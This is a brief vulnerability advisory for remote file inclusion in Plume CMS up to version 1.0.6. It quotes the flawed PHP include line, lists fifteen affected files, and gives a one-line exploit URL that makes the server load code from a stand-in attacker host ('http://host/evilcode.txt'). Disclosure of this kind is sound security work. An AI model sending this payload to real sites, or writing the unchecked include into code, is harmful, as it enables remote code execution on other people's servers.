Plume CMS versions 1.0.6 and below suffer form a remote file inclusion vulnerability.
fa2ad74956ac15e96fd97fc5e285e96b3782bfdf2eaccd142c6d5c1cf86a05a5
Plume CMS Multiple Remote File Include Vulnerabilities
Vulnerable Versions: Plume CMS <= 1.0.6
Vendor: Plume CMS http://plume-cms.net
-Vulnerable Code
include $_PX_config['manager_path'].'/directory/_file.php';
-Files Affected
./articles.php
./categories.php
./index.php
./news.php
./prefs.php
./sites.php
./subtypes.php
./users.php
./xmedia.php
./frontinc/class.template.php
./frontinc/prepend.php
./inc/lib.text.php
./install/index.php
./install/upgrade.php
./tools/htaccess/index.php
-Exploit
http://www.example.com/path/index.php?_PX_config[manager_path]=http://host/evilcode.txt?
-Credits
Vagner Rodrigues Fernandes (BugReport)
vagner.rodrigues@gmail.com